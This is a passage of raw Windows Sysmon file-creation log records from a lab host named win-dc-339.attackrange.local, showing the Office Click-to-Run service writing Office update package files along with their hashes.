Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\LTSHYPH_EN.LEXMD5=CA5FBB80EF147D32D692723B6FC43A17,SHA256=DF47FEF7BC36E73AC1D6C81DE8034F8AA9D931FDE7C6FC8A197349DBC557BF3B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PersonaSpy\personaspybridge.jsMD5=FDC65C7011DDAAA84BE2B9CF18F1A63D,SHA256=4AB6268A98711428184B1D1D1443D81500416E521FE7758C32E32F82A51B775E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PersonaSpy\PersonaSpy.jsMD5=A42F78E9F902B39A81075E0139015D2C,SHA256=DA4646C7816D78814F81C2041A8F015D43560376A6FAED9D98EF485A206A9648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PersonaSpy\PersonaSpy.htmlMD5=9A519C2CFB5A94630C667D06513853BE,SHA256=A9EC11E8675E40C7351BD52AB0FC4BF04E1682F19329C41E44F9664EBD687EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PersonaSpy\Office.Runtime.jsMD5=4F5B3896AFD852FE1334CAA3B2BD60C5,SHA256=F4975E55C5508A41CC927754AE855C78C749B28F014CBE41EFC4FF35F5881BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PersonaSpy\office.core.operational.jsMD5=D7AE754D1627F6FAA4A5EAD8945AC2AE,SHA256=D4664782AEC29E67A690FC85FAF63544BC7EF5ECD4BDC2D7363C2DF5D9C10D0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PersonaSpy\notice.txtMD5=BD4CEBE840C2B7FC478E01B2F3808EE1,SHA256=7C5F461BE587C8A5AF8A40CE8676879B3C1DBB0EC181D2BCC50D7C8254E3D461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PG_INDEX.XMLMD5=3F5BD43C350324B5D4A9F89D2B3FDD50,SHA256=B11EF92DEF98FE7944D4EB33880168A1C2E892C47CE2D7094A0E998DBBDD624E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN121.XMLMD5=7993E3215E80867771CAF2DEADD1E0BF,SHA256=BA0DD02AFC50FAE4D40EB2CAFC653F6B6B605178F1F331DA1281479C820DE5D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN120.XMLMD5=66362B9A219BE4D24398B3ED87A0942C,SHA256=FAE4F58A394238A0DD30DB771C5E28236400460ED38A5290EB8333507EA2428D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN114.XMLMD5=72A00EADE3E03FA7D0DD7648BEBFDB03,SHA256=41138F25A078A5B8BCAFEC7CF9E081E855511D54259B90D793BE9BA0A8D972DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN111.XMLMD5=551A6D1AEBA1A805B06ADF05B0F0380F,SHA256=737002ABD0C705D9604A02A864AC872A0207939837CCE3FE4062CB920DCBB02F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN110.XMLMD5=FB75E40C1EEF79242B759B6270D3B47E,SHA256=9070C30D37E869472779238D0B7BF66DC36FEF12850CA168A7A306C6BEAD94DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN109.XMLMD5=55C5BE4248B44250AF06C18CA9F0E26E,SHA256=9CE1F11803B5EF669DEA4698820BD2C333A005F62F811B6071D45A284933632D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN108.XMLMD5=B4CE25F53DC1B73C5E53E8D338273DB3,SHA256=D8F2C286C0C756588336CE2FD5778EE8866AA9239E25C738D16FFFD456794720,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN107.XMLMD5=412E7AA26E9FAAD40501076CA5A72CE4,SHA256=00220DFBA05AA5D3C9ACC26553A43BB73F1A673BCF23D781E7467BDDDEF17B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN105.XMLMD5=8C4958E0F921F142146822AE70109AD7,SHA256=D6A851B92874494AE1EF97D7C8D3DB7D84C9D923DEF3A6BFB174E8F1E84AD065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN103.XMLMD5=F29FEAD76B889D84D61832DCED348972,SHA256=0503F9977ABE3435297DDB2C19F87B7E58A1280DDC1C1CDB5C7679A4B4329DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN102.XMLMD5=270588291AF3F59C7064EBFF9757EBA0,SHA256=046AF5A2F0E189C3CB5C634B126EE93B5A75C6417AF9BC73D81D73A481AE7D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN097.XMLMD5=035FB190901F3B9A1211E086F2A09386,SHA256=B1F1B77D3B11299E3AD654EA736FFFE91E04D92F0D559BD7F2C394C849DC5F95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN096.XMLMD5=0812A51746E82E1BF100678093B8F595,SHA256=0BABBCD9B236E8D040D6E9DD4C2BACFF49DFAFB5F72ECCB19438CA2FB1B2D4AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN095.XMLMD5=8207E3689A83F100B088A1F2FBA2C972,SHA256=D90AC83C17FC07F3FEB94F0B9D21EEFCE23D70B1571DEF19FF329B3F461B270A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN092.XMLMD5=2DF33579C640458BE39620039AAB3793,SHA256=E10BF752C784585FD6C04255B9222BF9B54A93CF7C30B983001B53EB95EB0C01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN090.XMLMD5=206476D2BA9CDF5C7A563A020F3CF40B,SHA256=0564765ADB75B538A6143A2FDE69E8ADB6DFE319F2050B7E92492B10F9583DAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN089.XMLMD5=CC5292CEE5B974AC253801EDB90260A2,SHA256=77A88AB3B18DB1EE9E9EBB217C4F23961A3E93D1046F9661CB8BB8B3BC907A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN086.XMLMD5=B32B72748203F7AD7300653C8F26A9B4,SHA256=8688A38AE80013DDE4BBC420EAF6F2767E24F9757C6226D160D405B1F4BCDD00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN082.XMLMD5=6B4A76A789368617AF937CE60C7DC5CD,SHA256=2A2AC199EB48CDD9CEDEA8A5561DB5B7FBD832524B2DB47A4C7595DB4AF219B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN081.XMLMD5=295313436008C70542EE0F12B1D6F81A,SHA256=0195628EA2AF5BF337935E8118B544E5B76894DD7AD2F03A3EA1863E440F7E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN075.XMLMD5=AEFC54EF3184586373DBB262BD68A362,SHA256=337B792E389D4D58B12A625E58C21BF18F9A15F368C1544DD349A0B2D28D1E63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN065.XMLMD5=C42DC9B789398A924D5CC41095BF0B6D,SHA256=82A41B3BB1ADA40BF080CA8295346C82AC9692D444FEADEB3B7996C3E0F15BE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN058.XMLMD5=06A8BF3829B52CAA19DAB046487776EF,SHA256=506B8EA58F2764B282ABC12708084A82DD2874C95D26B14F426495FE4C4CAE55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN054.XMLMD5=E46BAC6C6FBEA2013DCC6B99D0819E11,SHA256=A31DE4D20B806DAC97F63EF9C808CDC55F0C0826468386B3115FF52377E5DD1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN048.XMLMD5=833DF07173AFBD8A1A425C2E15CF4E38,SHA256=A8C3FD28BAF7FAFC9E24B277D5DFA03746DD6B8C5138C44919FF157BBD6D0DAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN044.XMLMD5=66096748B02ED7B7D39ED0AEFE9EB540,SHA256=D4126BE8F2B25DBAC5183FC7F8D29D67AB0E41010BF268F52468DAB0E078437F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN027.XMLMD5=FC045A185BD99D4512386ACF73812183,SHA256=57CB0B8707A1CF0B5DAE872B4FF8ABC8DA8B83406A2A91E54D243627B3770ACC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN026.XMLMD5=53F8C22A2E8EAECEF8D94190D0D7015E,SHA256=AE65608D1D5E8D3E5C65EA5529DA6CDEF03614A2B1FC539D4D6E8A706E237421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN022.XMLMD5=84712D5AEABF953B220A2A05665EBD5C,SHA256=0DFD1597E2DC09600DC2BDE97CCB7CA3945ADA805DBB54410E68CBB9EADD9D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN020.XMLMD5=E976CD076ABEACEF0AAD2C8C2B2FE70B,SHA256=AB12C3F846C6BF48D888737B81A6669518D569389D023AC4A666F10883927059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN011.XMLMD5=F2CD000547F05CC10BA3F5B745C932D1,SHA256=B575C679987FD059766C24FE3E7D7300673C8D0B22E8DDD397CE694244AFE4DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN010.XMLMD5=1F15AD08368B581E4E36248D3D4A6617,SHA256=0CF17B663C8C93AFFAF0D995392BAE63FE66064156FFAF1E4043F1724D989558,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN002.XMLMD5=363FBAA5FE3D12BD8E60688AC80FD252,SHA256=A63393DC807033893BD25A86A579107122E5650D68156CC954F4861CE228973C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGMN001.XMLMD5=D97CEAED297533D95078DE906FF163B6,SHA256=0E59D625E62D4E2B42893A9ABF6869B1A93AFA038A830A8CDF9F1EF124551F9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL121.XMLMD5=428FBE89298327D17E71F798A2AFA4DF,SHA256=BA7AB31171C4DFAE45EDB99E673A03C3D2D33AC177BFBA2A05F3E8316CB4AE53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL120.XMLMD5=27F5B16EC036054E26DA1A1D703EF992,SHA256=968F61A56A49C12A6F4D68DA942A840332616030180481BEE4EA4D1AAF83E71C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL119.XMLMD5=0DCCADF4B57D0CA7DF1B6954F6A327BB,SHA256=8F4755D1AEF8AD7A5FC03A91DBDF6CDF207AE37C66655EE7BCED8482A7027484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 